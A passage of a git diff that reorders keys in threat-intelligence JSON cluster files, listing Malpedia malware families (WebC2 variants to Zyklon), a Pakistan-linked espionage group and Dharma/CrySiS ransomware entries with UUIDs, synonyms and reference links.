"WebC2-AdSpace", - "description": "" + "value": "WebC2-AdSpace" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "64f5ae85-1324-43de-ba3a-063785567be0", - "value": "WebC2-Ausov", - "description": "" + "value": "WebC2-Ausov" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "71292a08-9a7b-4df1-b1fd-7d80a8fcc18f", - "value": "WebC2-Bolid", - "description": "" + "value": "WebC2-Bolid" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5371bc44-dc07-4992-a3d7-c21705c50ac4", - "value": "WebC2-Cson", - "description": "" + "value": "WebC2-Cson" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_div", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "acdda3e5-e776-419b-b060-14f3406de061", - "value": "WebC2-DIV", - "description": "" + "value": "WebC2-DIV" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cfed10ed-6601-469e-a1df-2d561b031244", - "value": "WebC2-GreenCat", - "description": "" + "value": "WebC2-GreenCat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", - "value": "WebC2-Head", - "description": "" + "value": "WebC2-Head" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15094548-7555-43ee-8c0d-4557d6d8a087", - "value": "WebC2-Kt3", - "description": "" + "value": "WebC2-Kt3" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_qbp", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "71d8ef43-3767-494b-afaa-f58aad70df65", - "value": "WebC2-Qbp", - "description": "" + "value": "WebC2-Qbp" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", - "value": "WebC2-Rave", - "description": "" + "value": "WebC2-Rave" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1035ea6f-6743-4e69-861c-454c19ec96ae", - "value": "WebC2-Table", - "description": "" + "value": "WebC2-Table" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ugx", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156", - "value": "WebC2-UGX", - "description": "" + "value": "WebC2-UGX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_yahoo", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "52c1518d-175c-4b39-bc7c-353d2ddf382e", - "value": "WebC2-Yahoo", - "description": "" + "value": "WebC2-Yahoo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", - "value": "WebMonitor RAT", - "description": "" + "value": "WebMonitor RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d84ebd91-58f6-459f-96a1-d028a1719914", - "value": "WellMess", - "description": "" + "value": "WellMess" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wildfire", "https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2", - "value": "WildFire", - "description": "" + "value": "WildFire" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6a100902-7204-4f20-b838-545ed86d4428", - "value": "WinMM", - "description": "" + "value": "WinMM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", @@ -15369,117 +15371,114 @@ "https://github.com/TKCERT/winnti-nmap-script", "https://github.com/TKCERT/winnti-suricata-lua", "https://github.com/TKCERT/winnti-detector" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "" + "value": "Winnti" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winsloader", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "db755407-4135-414c-90e3-97f5e48c6065", - "value": "Winsloader", - "description": "" + "value": "Winsloader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6b6cf608-cc2c-40d7-8500-afca3e35e7e4", - "value": "Wipbot", - "description": "" + "value": "Wipbot" }, { + "description": "", "meta": { - "synonyms": [ - "Wimmie", - "Syndicasec" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost", "https://secrary.com/ReversingMalware/WMIGhost/", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] + ], + "synonyms": [ + "Wimmie", + "Syndicasec" + ], + "type": [] }, "uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40", - "value": "WMI Ghost", - "description": "" + "value": "WMI Ghost" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d8bf4ea1-054c-4a88-aa09-48da0d89c322", - "value": "WndTest", - "description": "" + "value": "WndTest" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bfa75eb1-1d8d-4127-932f-3b7090a242e9", - "value": "Wonknu", - "description": "" + "value": "Wonknu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woody", "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", - "value": "woody", - "description": "" + "value": "woody" }, { + "description": "", "meta": { - "synonyms": [ - "WoolenLogger" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" - ] + ], + "synonyms": [ + "WoolenLogger" + ], + "type": [] }, "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", - "value": "Woolger", - "description": "" + "value": "Woolger" }, { + "description": "", "meta": { - "synonyms": [ - "splm", - "chopstick" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", @@ -15488,103 +15487,104 @@ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" - ] + ], + "synonyms": [ + "splm", + "chopstick" + ], + "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" + "value": "X-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbot_pos", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c6467cc3-dafd-482e-881e-ef2e7e244436", - "value": "XBot POS", - "description": "" + "value": "XBot POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fb3a8164-d8cb-495d-9b1c-57bed00c21ed", - "value": "XBTL", - "description": "" + "value": "XBTL" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4da036c4-b76d-4f25-bc9e-3c5944ad0993", - "value": "Xpan", - "description": "" + "value": "Xpan" }, { + "description": "Incorporates code of Quasar RAT.", "meta": { - "synonyms": [ - "Expectra" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra", "https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/", "https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis" - ] + ], + "synonyms": [ + "Expectra" + ], + "type": [] }, "uuid": "5f9ba149-100a-46eb-a959-0645d872975b", - "value": "XPCTRA", - "description": "Incorporates code of Quasar RAT." + "value": "XPCTRA" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xp_privesc", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "33f97c52-0bcd-43f4-88bb-99e7da9f49ae", - "value": "XP PrivEsc (CVE-2014-4076)", - "description": "" + "value": "XP PrivEsc (CVE-2014-4076)" }, { + "description": "", "meta": { - "synonyms": [ - "nokian" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" - ] + ], + "synonyms": [ + "nokian" + ], + "type": [] }, "uuid": "b255fd2c-6ddb-452f-b660-c9f5d3a2ff63", - "value": "xsPlus", - "description": "" + "value": "xsPlus" }, { + "description": "", "meta": { - "synonyms": [ - "xaps" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", @@ -15595,136 +15595,135 @@ "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" - ] + ], + "synonyms": [ + "xaps" + ], + "type": [] }, "uuid": "53089817-6d65-4802-a7d2-5ccc3d919b74", - "value": "X-Tunnel", - "description": "" + "value": "X-Tunnel" }, { + "description": "", "meta": { - "synonyms": [ - "ShadowWalker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" - ] + ], + "synonyms": [ + "ShadowWalker" + ], + "type": [] }, "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", - "value": "xxmm", - "description": "" + "value": "xxmm" }, { + "description": "", "meta": { - "synonyms": [ - "KeyBoy" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yahoyah", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] + ], + "synonyms": [ + "KeyBoy" + ], + "type": [] }, "uuid": "a673b4fb-a864-4a5b-94ab-3fc4f5606cc8", - "value": "Yahoyah", - "description": "" + "value": "Yahoyah" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", + "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" + ], "synonyms": [ "bbsinfo", "aumlib" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih", - "https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html" - ] + "type": [] }, "uuid": "81157066-c2f6-4625-8070-c0a793d57e18", - "value": "yayih", - "description": "" + "value": "yayih" }, { + "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n", "meta": { - "synonyms": [ - "DarkShare" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.younglotus", "https://www.youtube.com/watch?v=AUGxYhE_CUY" - ] + ], + "synonyms": [ + "DarkShare" + ], + "type": [] }, "uuid": "1cc9d450-88cd-435c-bb74-8410d2d22571", - "value": "YoungLotus", - "description": "Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.\r\n\r\nPE timestamps suggest that it came into existence in the second half of 2014.\r\n\r\nSome versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).\r\n" + "value": "YoungLotus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty", "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/", "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200", - "value": "yty", - "description": "" + "value": "yty" }, { + "description": "", "meta": { - "synonyms": [ - "Zekapab" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" - ] + ], + "synonyms": [ + "Zekapab" + ], + "type": [] }, "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", - "value": "Zebrocy", - "description": "" + "value": "Zebrocy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4a5f2088-18cb-426a-92e2-1eb752c294c0", - "value": "Zebrocy (AutoIT)", - "description": "" + "value": "Zebrocy (AutoIT)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zedhou" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2211eade-4980-4143-acd7-5ecda26d9dfa", - "value": "Zedhou", - "description": "" + "value": "Zedhou" }, { + "description": "", "meta": { - "synonyms": [ - "Max++", - "Smiscer" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess", "https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/", @@ -15735,44 +15734,45 @@ "http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/", "http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/", "http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html" - ] + ], + "synonyms": [ + "Max++", + "Smiscer" + ], + "type": [] }, "uuid": "c7ff274f-2acc-4ee2-b74d-f1def12918d7", - "value": "ZeroAccess", - "description": "" + "value": "ZeroAccess" }, { + "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroevil", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "585f9f75-1239-4561-8815-c5ae033053a1", - "value": "ZeroEvil", - "description": "ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.\r\n\r\nIt first connects to a gate.php (version=). Upon success, an embedded VBS gets started connecting to logs_gate.php (plugin=, report=).\r\nSo far, only one embedded VBS was observed: it creates and starts a PowerShell script to retrieve all password from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes generated.\r\n\r\nThe ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).\r\n" + "value": "ZeroEvil" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zerot", "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c", - "value": "ZeroT", - "description": "" + "value": "ZeroT" }, { + "description": "", "meta": { - "synonyms": [ - "Zbot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus", "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", @@ -15793,156 +15793,156 @@ "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", "https://zeustracker.abuse.ch/monitor.php", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html" - ] + ], + "synonyms": [ + "Zbot" + ], + "type": [] }, "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", - "value": "Zeus", - "description": "" + "value": "Zeus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_mailsniffer" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "768f1ae5-81a6-49f2-87c1-821c247b4bf3", - "value": "Zeus MailSniffer", - "description": "" + "value": "Zeus MailSniffer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx", "https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/", "https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/", "https://securityintelligence.com/uk-banks-hit-with-new-zeus-sphinx-variant-and-renewed-kronos-banking-trojan-attacks/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "997c20b0-0992-498a-b69d-fc16ab2fd4e4", - "value": "Zeus Sphinx", - "description": "" + "value": "Zeus Sphinx" }, { + "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_ssl" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "74fc6a3a-cc51-4065-bdd9-fcef18c988a0", - "value": "Zeus SSL", - "description": "The sample listed here was previously mislabeled and is now integrated into win.floki_bot. The family is to-be-updated once we have a \"real\" Zeus SSL sample." + "value": "Zeus SSL" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zezin", "https://twitter.com/siri_urz/status/923479126656323584", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f", - "value": "Zezin", - "description": "" + "value": "Zezin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3c74a04d-583e-40ec-b347-bdfeb534c614", - "value": "ZhCat", - "description": "" + "value": "ZhCat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhmimikatz", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "989330e9-52da-4489-888b-686429db3a45", - "value": "ZhMimikatz", - "description": "" + "value": "ZhMimikatz" }, { + "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor.", "meta": { - "synonyms": [ - "Zeus Terdot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader", "https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/", "https://labs.bitdefender.com/2017/11/terdot-zeus-based-malware-strikes-back-with-a-blast-from-the-past/", "https://www.arbornetworks.com/blog/asert/great-dga-sphinx/" - ] + ], + "synonyms": [ + "Zeus Terdot" + ], + "type": [] }, "uuid": "13236f94-802b-4abc-aaa9-cb80cf4df9ed", - "value": "Zloader", - "description": "A banking trojan first observed in October 2016 has grown into a sophisticated hacking tool that works primarily as a banking trojan, but could also be used as an infostealer or backdoor." + "value": "Zloader" }, { + "description": "", "meta": { - "synonyms": [ - "gresim" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zoxpng", "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" - ] + ], + "synonyms": [ + "gresim" + ], + "type": [] }, "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", - "value": "ZoxPNG", - "description": "" + "value": "ZoxPNG" }, { + "description": "", "meta": { - "synonyms": [ - "Sensocode" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxshell", "https://blogs.cisco.com/security/talos/opening-zxshell", "https://blogs.rsa.com/cat-phishing/", "https://github.com/smb01/zxshell" - ] + ], + "synonyms": [ + "Sensocode" + ], + "type": [] }, "uuid": "23920e3b-246a-4172-bf9b-5e9f90510a15", - "value": "ZXShell", - "description": "" + "value": "ZXShell" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zyklon", "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "721e9af0-8a60-4b9e-9137-c23e86d75722", - "value": "Zyklon", - "description": "" + "value": "Zyklon" } ], - "version": 1649, - "source": "Malpedia", - "name": "Malpedia", - "uuid": "5fc98d08-90a4-498a-ad2e-0edf50ef374e" + "version": 1649 } diff --git a/clusters/microsoft-activity-group.json b/clusters/microsoft-activity-group.json index e1a15d8..794be13 100644 --- a/clusters/microsoft-activity-group.json +++ b/clusters/microsoft-activity-group.json @@ -205,27 +205,27 @@ "value": "ZIRCONIUM" }, { - "value": "https://www.cfr.org/interactive/cyber-operations/mythic-leopard", "description": "This threat actor uses social engineering and spear phishing to target military and defense organizations in India, for the purpose of espionage.", "meta": { - "refs": [ - "https://www.cfr.org/interactive/cyber-operations/mythic-leopard" - ], + "cfr-suspected-state-sponsor": "Pakistan", "cfr-suspected-victims": [ "India" ], - "cfr-suspected-state-sponsor": "Pakistan", - "cfr-type-of-incident": "Espionage", "cfr-target-category": [ "Government", "Private sector" ], + "cfr-type-of-incident": "Espionage", + "refs": [ + "https://www.cfr.org/interactive/cyber-operations/mythic-leopard" + ], "synonyms": [ "C-Major", "Transparent Tribe" ] }, - "uuid": "2a410eea-a9da-11e8-b404-37b7060746c8" + "uuid": "2a410eea-a9da-11e8-b404-37b7060746c8", + "value": "https://www.cfr.org/interactive/cyber-operations/mythic-leopard" } ], "version": 5 diff --git a/clusters/ransomware.json b/clusters/ransomware.json index 0c73b7c..90dbc50 100644 --- a/clusters/ransomware.json +++ b/clusters/ransomware.json @@ -3236,16 +3236,16 @@ "https://www.bleepingcomputer.com/news/security/new-bip-dharma-ransomware-variant-released/" ] }, - "uuid": "2b365b2c-4a9a-4b66-804d-3b2d2814fe7b", "related": [ { "dest-uuid": "15a30d84-4f5f-4b75-a162-e36107d30215", - "type": "similar", "tags": [ "estimative-language:likelihood-probability=\"likely\"" - ] + ], + "type": "similar" } ], + "uuid": "2b365b2c-4a9a-4b66-804d-3b2d2814fe7b", "value": "Dharma Ransomware" }, { @@ -9064,16 +9064,16 @@ "CrySiS" ] }, - "uuid": "15a30d84-4f5f-4b75-a162-e36107d30215", "related": [ { "dest-uuid": "2b365b2c-4a9a-4b66-804d-3b2d2814fe7b", - "type": "similar", "tags": [ "estimative-language:likelihood-probability=\"likely\"" - ] + ], + "type": "similar" } ], + "uuid": 